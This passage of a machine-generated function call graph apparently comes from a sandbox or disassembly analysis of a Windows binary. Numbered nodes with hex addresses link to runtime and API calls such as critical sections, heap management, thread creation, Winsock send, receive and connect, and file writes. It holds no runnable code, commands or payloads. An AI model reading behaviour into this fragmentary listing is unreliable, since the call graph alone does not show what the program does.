API calls 18239->18242 18240->18239 18240->18243 18241 2da22be 18241->18164 18244 2da2293 18242->18244 19345 2da22c3 18243->19345 18245 2da4e35 _vscan_fn 9 API calls 18244->18245 18246 2da229e 18245->18246 18246->18164 19402 2da27ae 18247->19402 18249 2da27a9 18249->18164 18251 2d99674 __EH_prolog 18250->18251 18252 2d91ba7 210 API calls 18251->18252 18253 2d996c9 18252->18253 18254 2d996e6 RtlEnterCriticalSection 18253->18254 18255 2d99701 18254->18255 18256 2d99704 RtlLeaveCriticalSection 18254->18256 18255->18256 18256->18164 18258 2d9a78c __EH_prolog 18257->18258 19408 2d9df33 18258->19408 18260 2d9a7aa shared_ptr 18260->18164 18262 2da183d 18261->18262 18263 2da1861 18261->18263 18262->18263 18264 2da1851 GetProcessHeap HeapFree 18262->18264 18263->18164 18264->18263 18266 2d94112 18265->18266 18268 2d94118 18265->18268 19412 2d9a636 18266->19412 18268->18164 18270 2da2389 18269->18270 18271 2da2374 18269->18271 18270->18271 18276 2da2390 18270->18276 18272 2da5d9b __setmbcp 59 API calls 18271->18272 18273 2da2379 18272->18273 18274 2da4e35 _vscan_fn 9 API calls 18273->18274 18275 2da2384 18274->18275 18275->18164 18276->18275 19414 2da5e41 18276->19414 19615 2db5330 18278->19615 18280 2d91bb1 RtlEnterCriticalSection 18281 2d91be9 RtlLeaveCriticalSection 18280->18281 18283 2d91bd1 18280->18283 19616 2d9e263 18281->19616 18283->18281 18284 2d91c55 RtlLeaveCriticalSection 18283->18284 18284->18164 18285 2d91c22 18285->18284 18288 2da0a50 Mailbox 68 API calls 18287->18288 18289 2d93c7e 18288->18289 19698 2d93ca2 18289->19698 18295 2d93d99 htons 18294->18295 18296 2d93dcb htons 18294->18296 19725 2d93bd3 18295->19725 19731 2d93c16 18296->19731 18300 2d93ded 18300->18164 18302 2d98f40 __EH_prolog 18301->18302 19762 2d9373f 18302->19762 18304 2d98f5a RtlEnterCriticalSection 18305 2d98f69 RtlLeaveCriticalSection 18304->18305 18307 2d98fa3 18305->18307 18307->18164 18309 2da2eec _malloc 59 API calls 18308->18309 18310 2d95362 SHGetSpecialFolderPathA 18309->18310 18311 2d95378 18310->18311 19771 2da36b4 18311->19771 18314 2d953e2 18314->18164 18316 2d953dc 19787 2da39c7 18316->19787 18319 2da0a79 18318->18319 18320 2d9513d 18318->18320 18332 2da32e7 18319->18332 18320->18176 18323 2da0a50 Mailbox 68 API calls 18322->18323 18324 2d9a672 18323->18324 18325 2d9519d 18324->18325 18398 2d92db5 18324->18398 18325->18182 18325->18185 18325->18186 18328 2da0a50 Mailbox 68 API calls 18327->18328 18330 2d9ce26 18328->18330 18329 2d9cf35 18329->18182 18330->18329 18425 2d92b95 18330->18425 18335 2da31eb 18332->18335 18334 2da32f2 18334->18320 18336 2da31f7 __setmbcp 18335->18336 18343 2da84d2 18336->18343 18342 2da321e __setmbcp 18342->18334 18344 2da882d __lock 59 API calls 18343->18344 18345 2da3200 18344->18345 18346 2da322f RtlDecodePointer RtlDecodePointer 18345->18346 18347 2da320c 18346->18347 18348 2da325c 18346->18348 18357 2da3229 18347->18357 18348->18347 18360 2da909d 18348->18360 18350 2da32bf RtlEncodePointer RtlEncodePointer 18350->18347 18351 2da3293 18351->18347 18354 2da8a3b __realloc_crt 62 API calls 18351->18354 18356 2da32ad RtlEncodePointer 18351->18356 18352 2da326e 18352->18350 18352->18351 18367 2da8a3b 18352->18367 18355 2da32a7 18354->18355 18355->18347 18355->18356 18356->18350 18394 2da84db 18357->18394 18361 2da90bb RtlSizeHeap 18360->18361 18362 2da90a6 18360->18362 18361->18352 18363 2da5d9b __setmbcp 59 API calls 18362->18363 18364 2da90ab 18363->18364 18365 2da4e35 _vscan_fn 9 API calls 18364->18365 18366 2da90b6 18365->18366 18366->18352 18371 2da8a42 18367->18371 18369 2da8a7f 18369->18351 18371->18369 18372 2db02e4 18371->18372 18393 2da9445 Sleep 18371->18393 18373 2db02f8 18372->18373 18374 2db02ed 18372->18374 18376 2db0300 18373->18376 18385 2db030d 18373->18385 18375 2da2eec _malloc 59 API calls 18374->18375 18377 2db02f5 18375->18377 18378 2da2eb4 _free 59 API calls 18376->18378 18377->18371 18390 2db0308 __dosmaperr 18378->18390 18379 2db0345 18380 2da8143 _malloc RtlDecodePointer 18379->18380 18382 2db034b 18380->18382 18381 2db0315 RtlReAllocateHeap 18381->18385 18381->18390 18383 2da5d9b __setmbcp 59 API calls 18382->18383 18383->18390 18384 2db0375 18387 2da5d9b __setmbcp 59 API calls 18384->18387 18385->18379 18385->18381 18385->18384 18386 2da8143 _malloc RtlDecodePointer 18385->18386 18389 2db035d 18385->18389 18386->18385 18388 2db037a GetLastError 18387->18388 18388->18390 18391 2da5d9b __setmbcp 59 API calls 18389->18391 18390->18371 18392 2db0362 GetLastError 18391->18392 18392->18390 18393->18371 18397 2da8997 RtlLeaveCriticalSection 18394->18397 18396 2da322e 18396->18342 18397->18396 18399 2d92dca 18398->18399 18400 2d92de4 18398->18400 18402 2da0a50 Mailbox 68 API calls 18399->18402 18401 2d92dfc 18400->18401 18403 2d92def 18400->18403 18412 2d92d39 WSASetLastError WSASend 18401->18412 18406 2d92dcf 18402->18406 18405 2da0a50 Mailbox 68 API calls 18403->18405 18405->18406 18406->18324 18407 2d92e54 WSASetLastError select 18422 2d9a43c 18407->18422 18409 2da0a50 68 API calls Mailbox 18410 2d92e0c 18409->18410 18410->18406 18410->18407 18410->18409 18411 2d92d39 71 API calls 18410->18411 18411->18410 18413 2d9a43c 69 API calls 18412->18413 18414 2d92d6e 18413->18414 18415 2d92d75 18414->18415 18418 2d92d82 18414->18418 18416 2da0a50 Mailbox 68 API calls 18415->18416 18417 2d92d7a 18416->18417 18420 2d92d9c 18417->18420 18421 2da0a50 Mailbox 68 API calls 18417->18421 18418->18417 18419 2da0a50 Mailbox 68 API calls 18418->18419 18419->18417 18420->18410 18421->18420 18423 2da0a50 Mailbox 68 API calls 18422->18423 18424 2d9a448 WSAGetLastError 18423->18424 18424->18410 18426 2d92bb1 18425->18426 18427 2d92bc7 18425->18427 18428 2da0a50 Mailbox 68 API calls 18426->18428 18429 2d92bd2 18427->18429 18434 2d92bdf 18427->18434 18433 2d92bb6 18428->18433 18431 2da0a50 Mailbox 68 API calls 18429->18431 18430 2d92be2 WSASetLastError WSARecv 18432 2d9a43c 69 API calls 18430->18432 18431->18433 18432->18434 18433->18330 18434->18430 18434->18433 18435 2d92d22 18434->18435 18437 2d92cbc WSASetLastError select 18434->18437 18439 2da0a50 68 API calls Mailbox 18434->18439 18440 2d91996 18435->18440 18438 2d9a43c 69 API calls 18437->18438 18438->18434 18439->18434 18441 2d9199f 18440->18441 18443 2d919bb 18440->18443 18442 2da32e7 __cinit 68 API calls 18441->18442 18442->18443 18443->18433 18466 2d9e1b3 18444->18466 18446 2d9d033 18446->18204 18548 2da32fc 18447->18548 18450 2da2054 18450->18206 18451 2da207d ResumeThread 18451->18206 18452 2da2076 CloseHandle 18452->18451 18454 2da0a50 Mailbox 68 API calls 18453->18454 18455 2d93fb8 18454->18455 19166 2d91815 18455->19166 18458 2d9a5be 18459 2d9a5c8 __EH_prolog 18458->18459 19172 2d9cb76 18459->19172 18464 2da449a __CxxThrowException@8 RaiseException 18467 2d9e1bd __EH_prolog 18466->18467 18472 2d94030 18467->18472 18471 2d9e1eb 18471->18446 18484 2db5330 18472->18484 18474 2d9403a GetProcessHeap RtlAllocateHeap 18475 2d9407c 18474->18475 18476 2d94053 std::exception::exception 18474->18476 18475->18471 18478 2d9408a 18475->18478 18485 2d9a5fd 18476->18485 18479 2d94094 __EH_prolog 18478->18479 18529 2d9a21c 18479->18529 18484->18474 18486 2d9a607 __EH_prolog 18485->18486 18493 2d9cbac 18486->18493 18491 2da449a __CxxThrowException@8 RaiseException 18492 2d9a635 18491->18492 18499 2d9d70c 18493->18499 18496 2d9cbc6 18521 2d9d744 18496->18521 18498 2d9a624 18498->18491 18502 2da2453 18499->18502 18505 2da2481 18502->18505 18506 2da248f 18505->18506 18507 2d9a616 18505->18507 18511 2da2517 18506->18511 18507->18496 18512 2da2520 18511->18512 18514 2da2494 18511->18514 18513 2da2eb4 _free 59 API calls 18512->18513 18513->18514 18514->18507 18515 2da24d9 18514->18515 18516 2da250a 18515->18516 18517 2da24e5 _strlen 18515->18517 18516->18507 18518 2da2eec _malloc 59 API calls 18517->18518 18519 2da24f7 18518->18519 18519->18516 18520 2da6bfc __setenvp 59 API calls 18519->18520 18520->18516 18522 2d9d74e __EH_prolog 18521->18522 18525 2d9b66f 18522->18525 18524 2d9d785 Mailbox 18524->18498 18526 2d9b679 __EH_prolog 18525->18526 18527 2da2453 std::exception::exception 59 API calls 18526->18527 18528 2d9b68a Mailbox 18527->18528 18528->18524 18540 2d9b033 18529->18540 18532 2d93fdc 18547 2db5330 18532->18547 18534 2d93fe6 CreateEventA 18535 2d93ffd 18534->18535 18536 2d9400f 18534->18536 18537 2d93fb0 Mailbox 68 API calls 18535->18537 18536->18471 18538 2d94005 18537->18538 18539 2d9a5be Mailbox 60 API calls 18538->18539 18539->18536 18541 2d940c1 18540->18541 18542 2d9b03f 18540->18542 18541->18532 18543 2da3a8f _Allocate 60 API calls 18542->18543 18544 2d9b04f std::exception::exception 18542->18544 18543->18544 18544->18541 18545 2da449a __CxxThrowException@8 RaiseException 18544->18545 18546 2d9fa64 18545->18546 18547->18534 18549 2da330a 18548->18549 18550 2da331e 18548->18550 18552 2da5d9b __setmbcp 59 API calls 18549->18552 18551 2da89ac __calloc_crt 59 API calls 18550->18551 18553 2da332b 18551->18553 18554 2da330f 18552->18554 18555 2da337c 18553->18555 18567 2da5b9a 18553->18567 18556 2da4e35 _vscan_fn 9 API calls 18554->18556 18558 2da2eb4 _free 59 API calls 18555->18558 18559 2da204b 18556->18559 18561 2da3382 18558->18561 18559->18450 18559->18451 18559->18452 18561->18559 18572 2da5d7a 18561->18572 18562 2da5c21 __initptd 59 API calls 18563 2da3341 CreateThread 18562->18563 18563->18559 18566 2da3374 GetLastError 18563->18566 18580 2da345c 18563->18580 18566->18555 18568 2da5bb2 __getptd_noexit 59 API calls 18567->18568 18569 2da5ba0 18568->18569 18570 2da3338 18569->18570 18571 2da837f __amsg_exit 59 API calls 18569->18571 18570->18562 18571->18570 18577 2da5d67 18572->18577 18574 2da5d83 __dosmaperr 18575 2da5d9b __setmbcp 59 API calls 18574->18575 18576 2da5d96 18575->18576 18576->18559 18578 2da5bb2 __getptd_noexit 59 API calls 18577->18578 18579 2da5d6c 18578->18579 18579->18574 18581 2da3465 __threadstartex@4 18580->18581 18582 2da910b __getptd_noexit TlsGetValue 18581->18582 18583 2da346b 18582->18583 18584 2da349e 18583->18584 18585 2da3472 __threadstartex@4 18583->18585 18612 2da5a2f 18584->18612 18587 2da912a __getptd_noexit TlsSetValue 18585->18587 18588 2da3481 18587->18588 18591 2da3487 GetLastError RtlExitUserThread 18588->18591 18592 2da3494 GetCurrentThreadId 18588->18592 18589 2da34b9 ___crtIsPackagedApp 18590 2da34cd 18589->18590 18596 2da3404 18589->18596 18602 2da3395 18590->18602 18591->18592 18592->18589 18597 2da340d LoadLibraryExW GetProcAddress 18596->18597 18598 2da3446 RtlDecodePointer 18596->18598 18599 2da342f 18597->18599 18600 2da3430 RtlEncodePointer 18597->18600 18601 2da3456 18598->18601 18599->18590 18600->18598 18601->18590 18603 2da33a1 __setmbcp 18602->18603 18604 2da5b9a __setmbcp 59 API calls 18603->18604 18605 2da33a6 18604->18605 18644 2da20a0 18605->18644 18613 2da5a3b __setmbcp 18612->18613 18614 2da5b43 __setmbcp 18613->18614 18615 2da2eb4 _free 59 API calls 18613->18615 18616 2da5a54 18613->18616 18614->18589 18615->18616 18617 2da5a63 18616->18617 18618 2da2eb4 _free 59 API calls 18616->18618 18619 2da5a72 18617->18619 18620 2da2eb4 _free 59 API calls 18617->18620 18618->18617 18621 2da5a81 18619->18621 18623 2da2eb4 _free 59 API calls 18619->18623 18620->18619 18622 2da5a90 18621->18622 18624 2da2eb4 _free 59 API calls 18621->18624 18625 2da5a9f 18622->18625 18626 2da2eb4 _free 59 API calls 18622->18626 18623->18621 18624->18622 18627 2da5aae 18625->18627 18628 2da2eb4 _free 59 API calls 18625->18628 18626->18625 18629 2da5ac0 18627->18629 18631 2da2eb4 _free 59 API calls 18627->18631 18628->18627 18630 2da882d __lock 59 API calls 18629->18630 18634 2da5ac8 18630->18634 18631->18629 18632 2da5aeb 18912 2da5b4f 18632->18912 18634->18632 18636 2da2eb4 _free 59 API calls 18634->18636 18636->18632 18637 2da882d __lock 59 API calls 18642 2da5aff ___removelocaleref 18637->18642 18638 2da5b30 18945 2da5b5b 18638->18945 18642->18638 18915 2da4f05 18642->18915 18662 2da1550 18644->18662 18647 2da20e8 TlsSetValue 18648 2da20f0 18647->18648 18684 2d9dce7 18648->18684 18663 2da15b4 18662->18663 18664 2da1630 18663->18664 18665 2da15cc 18663->18665 18672 2da16dc WaitForSingleObject 18663->18672 18679 2da16b0 CreateEventA 18663->18679 18680 2da1b50 GetCurrentProcessId 18663->18680 18683 2da16ce CloseHandle 18663->18683 18666 2da1646 18664->18666 18668 2da1643 CloseHandle 18664->18668 18667 2da160e ResetEvent 18665->18667 18670 2da15e5 OpenEventA 18665->18670 18700 2da1b50 18665->18700 18669 2da448b __cftoe_l 6 API calls 18666->18669 18678 2da1615 18667->18678 18668->18666 18671 2da165e 18669->18671 18674 2da15ff 18670->18674 18675 2da1607 18670->18675 18671->18647 18671->18648 18672->18663 18674->18675 18677 2da1604 CloseHandle 18674->18677 18675->18667 18675->18678 18676 2da15e2 18676->18670 18677->18675 18704 2da1790 18678->18704 18679->18663 18680->18663 18683->18663 18685 2d9dd09 18684->18685 18715 2d94d86 18685->18715 18714 2da0bb0 18700->18714 18702 2da1ba2 GetCurrentProcessId 18703 2da1bb5 18702->18703 18703->18676 18708 2da179f 18704->18708 18705 2da17f7 18706 2da162d 18705->18706 18707 2da1803 SetEvent 18705->18707 18706->18664 18707->18706 18708->18705 18709 2da17d5 CreateEventA 18708->18709 18710 2da1b50 GetCurrentProcessId 18708->18710 18709->18705 18711 2da17eb 18709->18711 18712 2da17d2 18710->18712 18711->18705 18713 2da17f0 CloseHandle 18711->18713 18712->18709 18713->18705 18714->18702 18948 2da8997 RtlLeaveCriticalSection 18912->18948 18914 2da5af8 18914->18637 18916 2da4f1a 18915->18916 18917 2da4f7e 18915->18917 18916->18917 18948->18914 19169 2da2413 19166->19169 19170 2da24d9 std::exception::_Copy_str 59 API calls 19169->19170 19171 2d9182a 19170->19171 19171->18458 19178 2d9d63d 19172->19178 19175 2d9cb90 19187 2d9d675 19175->19187 19177 2d9a5eb 19177->18464 19181 2d9b161 19178->19181 19182 2d9b16b __EH_prolog 19181->19182 19183 2da2453 std::exception::exception 59 API calls 19182->19183 19184 2d9b17c 19183->19184 19185 2d97c31 std::bad_exception::bad_exception 60 API calls 19184->19185 19186 2d9a5dd 19185->19186 19186->19175 19188 2d9d67f __EH_prolog 19187->19188 19191 2d9b559 19188->19191 19190 2d9d6b6 Mailbox 19190->19177 19192 2d9b563 __EH_prolog 19191->19192 19193 2d9b161 std::bad_exception::bad_exception 60 API calls 19192->19193 19194 2d9b574 Mailbox 19193->19194 19194->19190 19216 2d9353e 19195->19216 19199 2d92ae8 WSASetLastError connect 19198->19199 19200 2d92ad8 19198->19200 19201 2d9a43c 69 API calls 19199->19201 19202 2da0a50 Mailbox 68 API calls 19200->19202 19203 2d92b07 19201->19203 19204 2d92add 19202->19204 19203->19204 19205 2da0a50 Mailbox 68 API calls 19203->19205 19206 2da0a50 Mailbox 68 API calls 19204->19206 19205->19204 19207 2d92b1b 19206->19207 19209 2da0a50 Mailbox 68 API calls 19207->19209 19211 2d92b38 19207->19211 19209->19211 19212 2d92b87 19211->19212 19276 2d93027 19211->19276 19212->18215 19215 2da0a50 Mailbox 68 API calls 19215->19212 19217 2d93548 __EH_prolog 19216->19217 19218 2d93557 19217->19218 19219 2d93576 19217->19219 19221 2d91996 68 API calls 19218->19221 19238 2d92edd WSASetLastError WSASocketA 19219->19238 19237 2d9355f 19221->19237 19223 2d935ad CreateIoCompletionPort 19224 2d935db 19223->19224 19225 2d935c5 GetLastError 19223->19225 19227 2da0a50 Mailbox 68 API calls 19224->19227 19226 2da0a50 Mailbox 68 API calls 19225->19226 19228 2d935d2 19226->19228 19227->19228 19229 2d935ef 19228->19229 19230 2d93626 19228->19230 19231 2da0a50 Mailbox 68 API calls 19229->19231 19264 2d9de26 19230->19264 19232 2d93608 19231->19232 19246 2d929ee 19232->19246 19235 2d93659 19236 2da0a50 Mailbox 68 API calls 19235->19236 19236->19237 19237->18216 19239 2da0a50 Mailbox 68 API calls 19238->19239 19240 2d92f0a WSAGetLastError 19239->19240 19241 2d92f41 19240->19241 19242 2d92f21 19240->19242 19241->19223 19241->19237 19243 2d92f3c 19242->19243 19244 2d92f27 setsockopt 19242->19244 19245 2da0a50 Mailbox 68 API calls 19243->19245 19244->19243 19245->19241 19247 2d92a0c 19246->19247 19263 2d92aad 19246->19263 19249 2d92a39 WSASetLastError closesocket 19247->19249 19253 2da0a50 Mailbox 68 API calls 19247->19253 19248 2da0a50 Mailbox 68 API calls 19250 2d92ab8 19248->19250 19251 2d9a43c 69 API calls 19249->19251 19250->19237 19252 2d92a51 19251->19252 19256 2da0a50 Mailbox 68 API calls 19252->19256 19252->19263 19254 2d92a21 19253->19254 19268 2d92f50 19254->19268 19258 2d92a5c 19256->19258 19259 2d92a7b ioctlsocket WSASetLastError closesocket 19258->19259 19260 2da0a50 Mailbox 68 API calls 19258->19260 19262 2d9a43c 69 API calls 19259->19262 19261 2d92a6e 19260->19261 19261->19259 19261->19263 19262->19263 19263->19248 19263->19250 19265 2d9de30 __EH_prolog 19264->19265 19266 2da3a8f _Allocate 60 API calls 19265->19266 19267 2d9de44 19266->19267 19267->19235 19269 2d92f5b 19268->19269 19270 2d92f70 WSASetLastError setsockopt 19268->19270 19271 2da0a50 Mailbox 68 API calls 19269->19271 19272 2d9a43c 69 API calls 19270->19272 19274 2d92a36 19271->19274 19273 2d92f9e 19272->19273 19273->19274 19275 2da0a50 Mailbox 68 API calls 19273->19275 19274->19249 19275->19274 19277 2d9303b 19276->19277 19278 2d9304d WSASetLastError select 19276->19278 19279 2da0a50 Mailbox 68 API calls 19277->19279 19280 2d9a43c 69 API calls 19278->19280 19283 2d92b59 19279->19283 19281 2d93095 19280->19281 19282 2da0a50 Mailbox 68 API calls 19281->19282 19281->19283 19282->19283 19283->19212 19284 2d92fb4 19283->19284 19285 2d92fc0 19284->19285 19286 2d92fd5 WSASetLastError getsockopt 19284->19286 19287 2da0a50 Mailbox 68 API calls 19285->19287 19288 2d9a43c 69 API calls 19286->19288 19291 2d92b7a 19287->19291 19289 2d9300f 19288->19289 19290 2da0a50 Mailbox 68 API calls 19289->19290 19289->19291 19290->19291 19291->19212 19291->19215 19299 2db5330 19292->19299 19294 2d932b5 RtlEnterCriticalSection 19295 2da0a50 Mailbox 68 API calls 19294->19295 19296 2d932d6 19295->19296 19300 2d93307 19296->19300 19299->19294 19302 2d93311 __EH_prolog 19300->19302 19303 2d93350 19302->19303 19312 2d97db5 19302->19312 19316 2d9239d 19303->19316 19306 2d93390 19322 2d97d5e 19306->19322 19307 2da0a50 Mailbox 68 API calls 19309 2d9337c 19307->19309 19311 2d92d39 71 API calls 19309->19311 19311->19306 19313 2d97dc3 19312->19313 19315 2d97e39 19313->19315 19326 2d9891a 19313->19326 19315->19302 19317 2d923ab 19316->19317 19318 2d92417 19317->19318 19319 2d923c1 PostQueuedCompletionStatus 19317->19319 19321 2d923f8 InterlockedExchange RtlLeaveCriticalSection 19317->19321 19318->19306 19318->19307 19319->19317 19320 2d923da RtlEnterCriticalSection 19319->19320 19320->19317 19321->19317 19325 2d97d63 19322->19325 19323 2d932ee RtlLeaveCriticalSection 19323->18231 19325->19323 19342 2d91e7f 19325->19342 19327 2d98944 19326->19327 19328 2d97d5e 68 API calls 19327->19328 19330 2d9898a 19328->19330 19329 2d989b1 19329->19315 19330->19329 19332 2d9a1a7 19330->19332 19333 2d9a1c1 19332->19333 19334 2d9a1b1 19332->19334 19333->19329 19334->19333 19337 2d9fa65 19334->19337 19338 2da2413 std::exception::exception 59 API calls 19337->19338 19339 2d9fa7d 19338->19339 19340 2da449a __CxxThrowException@8 RaiseException 19339->19340 19341 2d9fa92 19340->19341 19343 2da0a50 Mailbox 68 API calls 19342->19343 19344 2d91e90 19343->19344 19344->19325 19355 2da21bb 19345->19355 19348 2da22e5 19350 2da5d9b __setmbcp 59 API calls 19348->19350 19349 2da22fc 19352 2da22f5 ___ascii_stricmp 19349->19352 19354 2da58ba 66 API calls __tolower_l 19349->19354 19351 2da22ea 19350->19351 19353 2da4e35 _vscan_fn 9 API calls 19351->19353 19352->18241 19353->19352 19354->19349 19356 2da21cc 19355->19356 19360 2da2219 19355->19360 19357 2da5b9a __setmbcp 59 API calls 19356->19357 19358 2da21d2 19357->19358 19359 2da21f9 19358->19359 19363 2da50ff 19358->19363 19359->19360 19378 2da5481 19359->19378 19360->19348 19360->19349 19364 2da510b __setmbcp 19363->19364 19365 2da5b9a __setmbcp 59 API calls 19364->19365 19366 2da5114 19365->19366 19367 2da5143 19366->19367 19369 2da5127 19366->19369 19368 2da882d __lock 59 API calls 19367->19368 19371 2da514a 19368->19371 19370 2da5b9a __setmbcp 59 API calls 19369->19370 19372 2da512c 19370->19372 19390 2da517f 19371->19390 19375 2da513a __setmbcp 19372->19375 19377 2da837f __amsg_exit 59 API calls 19372->19377 19375->19359 19377->19375 19379 2da548d __setmbcp 19378->19379 19380 2da5b9a __setmbcp 59 API calls 19379->19380 19381 2da5497 19380->19381 19382 2da54a9 19381->19382 19383 2da882d __lock 59 API calls 19381->19383 19384 2da54b7 __setmbcp 19382->19384 19386 2da837f __amsg_exit 59 API calls 19382->19386 19388 2da54c7 19383->19388 19384->19360 19385 2da54f4 19398 2da551e 19385->19398 19386->19384 19388->19385 19389 2da2eb4 _free 59 API calls 19388->19389 19389->19385 19391 2da518a ___addlocaleref ___removelocaleref 19390->19391 19393 2da515e 19390->19393 19392 2da4f05 ___freetlocinfo 59 API calls 19391->19392 19391->19393 19392->19393 19394 2da5176 19393->19394 19397 2da8997 RtlLeaveCriticalSection 19394->19397 19396 2da517d 19396->19372 19397->19396 19401 2da8997 RtlLeaveCriticalSection 19398->19401 19400 2da5525 19400->19382 19401->19400 19403 2da27cb 19402->19403 19404 2da5d9b __setmbcp 59 API calls 19403->19404 19407 2da27db _strlen 19403->19407 19405 2da27d0 19404->19405 19406 2da4e35 _vscan_fn 9 API calls 19405->19406 19406->19407 19407->18249 19409 2d9df3d __EH_prolog 19408->19409 19410 2da3a8f _Allocate 60 API calls 19409->19410 19411 2d9df54 19410->19411 19411->18260 19413 2d9a645 GetProcessHeap HeapFree 19412->19413 19413->18268 19435 2da9d71 19414->19435 19416 2da5e4f 19417 2da5e5a 19416->19417 19418 2da5e71 19416->19418 19420 2da5d9b __setmbcp 59 API calls 19417->19420 19419 2da5e76 19418->19419 19429 2da5e83 __flsbuf 19418->19429 19421 2da5d9b __setmbcp 59 API calls 19419->19421 19428 2da5e5f 19420->19428 19421->19428 19422 2da5edd 19423 2da5f61 19422->19423 19424 2da5ee7 19422->19424 19425 2da9d95 __write 79 API calls 19423->19425 19426 2da5f01 19424->19426 19432 2da5f18 19424->19432 19425->19428 19454 2da9d95 19426->19454 19428->18275 19429->19422 19429->19428 19431 2da5ed2 19429->19431 19442 2daf6e2 19429->19442 19431->19422 19451 2daf8a5 19431->19451 19432->19428 19482 2daf736 19432->19482 19436 2da9d7b 19435->19436 19437 2da9d90 19435->19437 19438 2da5d9b __setmbcp 59 API calls 19436->19438 19437->19416 19439 2da9d80 19438->19439 19440 2da4e35 _vscan_fn 9 API calls 19439->19440 19441 2da9d8b 19440->19441 19441->19416 19443 2daf6ed 19442->19443 19445 2daf6fa 19442->19445 19444 2da5d9b __setmbcp 59 API calls 19443->19444 19447 2daf6f2 19444->19447 19446 2da5d9b __setmbcp 59 API calls 19445->19446 19448 2daf706 19445->19448 19449 2daf727 19446->19449 19447->19431 19448->19431 19450 2da4e35 _vscan_fn 9 API calls 19449->19450 19450->19447 19452 2da89f4 __malloc_crt 59 API calls 19451->19452 19453 2daf8ba 19452->19453 19453->19422 19455 2da9da1 __setmbcp 19454->19455 19456 2da9dae 19455->19456 19457 2da9dc5 19455->19457 19458 2da5d67 __set_osfhnd 59 API calls 19456->19458 19459 2da9e64 19457->19459 19461 2da9dd9 19457->19461 19460 2da9db3 19458->19460 19462 2da5d67 __set_osfhnd 59 API calls 19459->19462 19463 2da5d9b __setmbcp 59 API calls 19460->19463 19464 2da9e01 19461->19464 19465 2da9df7 19461->19465 19466 2da9dfc 19462->19466 19467 2da9dba __setmbcp 19463->19467 19507 2db0bc7 19464->19507 19468 2da5d67 __set_osfhnd 59 API calls 19465->19468 19471 2da5d9b __setmbcp 59 API calls 19466->19471 19467->19428 19468->19466 19470 2da9e07 19472 2da9e1a 19470->19472 19473 2da9e2d 19470->19473 19474 2da9e70 19471->19474 19516 2da9e84 19472->19516 19477 2da5d9b __setmbcp 59 API calls 19473->19477 19476 2da4e35 _vscan_fn 9 API calls 19474->19476 19476->19467 19478 2da9e32 19477->19478 19479 2da5d67 __set_osfhnd 59 API calls 19478->19479 19480 2da9e26 19479->19480 19575 2da9e5c 19480->19575 19483 2daf742 __setmbcp 19482->19483 19484 2daf76b 19483->19484 19485 2daf753 19483->19485 19487 2daf810 19484->19487 19491 2daf7a0 19484->19491 19486 2da5d67 __set_osfhnd 59 API calls 19485->19486 19488 2daf758 19486->19488 19489 2da5d67 __set_osfhnd 59 API calls 19487->19489 19490 2da5d9b __setmbcp 59 API calls 19488->19490 19492 2daf815 19489->19492 19503 2daf760 __setmbcp 19490->19503 19493 2db0bc7 ___lock_fhandle 60 API calls 19491->19493 19494 2da5d9b __setmbcp 59 API calls 19492->19494 19495 2daf7a6 19493->19495 19496 2daf81d 19494->19496 19497 2daf7bc 19495->19497 19498 2daf7d4 19495->19498 19499 2da4e35 _vscan_fn 9 API calls 19496->19499 19500 2daf832 __lseeki64_nolock 61 API calls 19497->19500 19501 2da5d9b __setmbcp 59 API calls 19498->19501 19499->19503 19502 2daf7cb 19500->19502 19504 2daf7d9 19501->19504 19611 2daf808 19502->19611 19503->19428 19505 2da5d67 __set_osfhnd 59 API calls 19504->19505 19505->19502 19508 2db0bd3 __setmbcp 19507->19508 19509 2db0c22 RtlEnterCriticalSection 19508->19509 19511 2da882d __lock 59 API calls 19508->19511 19510 2db0c48 __setmbcp 19509->19510 19510->19470 19512 2db0bf8 19511->19512 19513 2db0c10 19512->19513 19514 2da914c __mtinitlocks InitializeCriticalSectionAndSpinCount 19512->19514 19578 2db0c4c 19513->19578 19514->19513 19517 2da9e91 __write_nolock 19516->19517 19518 2da9eef 19517->19518 19519 2da9ed0 19517->19519 19547 2da9ec5 19517->19547 19522 2da9f47 19518->19522 19523 2da9f2b 19518->19523 19521 2da5d67 __set_osfhnd 59 API calls 19519->19521 19520 2da448b __cftoe_l 6 API calls 19524 2daa6e5 19520->19524 19525 2da9ed5 19521->19525 19527 2da9f60 19522->19527 19582 2daf832 19522->19582 19526 2da5d67 __set_osfhnd 59 API calls 19523->19526 19524->19480 19528 2da5d9b __setmbcp 59 API calls 19525->19528 19532 2da9f30 19526->19532 19531 2daf6e2 __write_nolock 59 API calls 19527->19531 19530 2da9edc 19528->19530 19533 2da4e35 _vscan_fn 9 API calls 19530->19533 19534 2da9f6e 19531->19534 19535 2da5d9b __setmbcp 59 API calls 19532->19535 19533->19547 19536 2daa2c7 19534->19536 19541 2da5b9a __setmbcp 59 API calls 19534->19541 19537 2da9f37 19535->19537 19538 2daa65a WriteFile 19536->19538 19539 2daa2e5 19536->19539 19540 2da4e35 _vscan_fn 9 API calls 19537->19540 19542 2daa2ba GetLastError 19538->19542 19549 2daa287 19538->19549 19543 2daa409 19539->19543 19552 2daa2fb 19539->19552 19540->19547 19544 2da9f9a GetConsoleMode 19541->19544 19542->19549 19553 2daa414 19543->19553 19556 2daa4fe 19543->19556 19544->19536 19546 2da9fd9 19544->19546 19545 2daa693 19545->19547 19548 2da5d9b __setmbcp 59 API calls 19545->19548 19546->19536 19550 2da9fe9 GetConsoleCP 19546->19550 19547->19520 19554 2daa6c1 19548->19554 19549->19545 19549->19547 19555 2daa3e7 19549->19555 19550->19545 19573 2daa018 19550->19573 19551 2daa36a WriteFile 19551->19542 19551->19552 19552->19545 19552->19549 19552->19551 19553->19545 19553->19549 19557 2daa479 WriteFile 19553->19557 19558 2da5d67 __set_osfhnd 59 API calls 19554->19558 19559 2daa68a 19555->19559 19560 2daa3f2 19555->19560 19556->19545 19556->19549 19561 2daa573 WideCharToMultiByte 19556->19561 19564 2daa5c2 WriteFile 19556->19564 19557->19542 19557->19553 19558->19547 19563 2da5d7a __dosmaperr 59 API calls 19559->19563 19562 2da5d9b __setmbcp 59 API calls 19560->19562 19561->19542 19561->19556 19565 2daa3f7 19562->19565 19563->19547 19564->19556 19567 2daa615 GetLastError 19564->19567 19568 2da5d67 __set_osfhnd 59 API calls 19565->19568 19567->19556 19568->19547 19569 2db0f93 WriteConsoleW CreateFileW __putwch_nolock 19569->19573 19570 2daff4a 61 API calls __write_nolock 19570->19573 19571 2daa101 WideCharToMultiByte 19571->19549 19572 2daa13c WriteFile 19571->19572 19572->19542 19572->19573 19573->19542 19573->19549 19573->19569 19573->19570 19573->19571 19574 2daa196 WriteFile 19573->19574 19591 2dadc88 19573->19591 19574->19542 